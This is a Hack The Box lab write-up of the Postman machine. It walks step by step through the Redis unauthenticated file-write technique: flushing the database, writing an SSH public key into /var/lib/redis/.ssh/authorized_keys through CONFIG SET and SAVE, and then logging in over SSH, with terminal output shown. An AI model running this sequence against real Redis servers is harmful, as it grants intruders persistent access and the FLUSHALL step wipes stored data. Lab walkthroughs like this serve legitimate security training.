InfoSec LAB

Postman_Exploitation

Created: 4 min read

Redis SSH File Write

The target Redis server is configured to not require authentication, allowing anonymous access to the instance Additionally, it also does grant the write access to anyone, which can be leverage to perform a file write operation on the host system

while there are many ways to abuse a file write operation to gain a foothold, i will go with the ssh key write method

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ (echo -e "\n\n"; cat ~/.ssh/id_ed25519.pub ; echo -e "\n\n") > spaced_key.txt
 
┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ cat spaced_key.txt 
 
 
 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali

I will first create a SSH public key file with 2 new lines at both ends

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP FLUSHALL
OK

Then, I will flush all the keys within the target Redis instance to reserve a space for the current operation

this is necessary as i kept getting into the following error: (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ cat ./spaced_key.txt | redis-cli -h $IP -x SET ssh_key

Generating a new key-value pair with my public SSH key being the value

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP CONFIG SET dir /var/lib/redis/.ssh
OK

Then, I will change the dir attribute to the SSH directory of the redis account

  • This ONLY works if the .ssh directory already exists within the home directory of the redis account
  • Additionally, the redis account is supposedly present from the default installation and being used to run the Redis instance
┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP CONFIG SET dbfilename authorized_keys 
OK

The authorized_keys file can be created this way by leveraging the database creation with CONFIG SET dbfilename

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP SAVE
OK

Save the changes to take effect Now, the /var/lib/redis/.ssh/authorized_keys file is present with its content being my publish SSH key As long as the sshd configuration in the target system allows, I should be able to simply SSH into the target system as the redis account using my own SSH key.

SSH

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ ssh redis@$IP -i ~/.ssh/id_ed25519 
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
 
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
redis@Postman:~$ hostname
Postman
redis@Postman:~$ ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.160  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:6363  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:6363  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:63:63  txqueuelen 1000  (Ethernet)
        RX packets 294  bytes 29310 (29.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 127  bytes 14703 (14.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1896  bytes 135160 (135.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1896  bytes 135160 (135.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the redis account via SSH

Interactive Graph View

Backlinks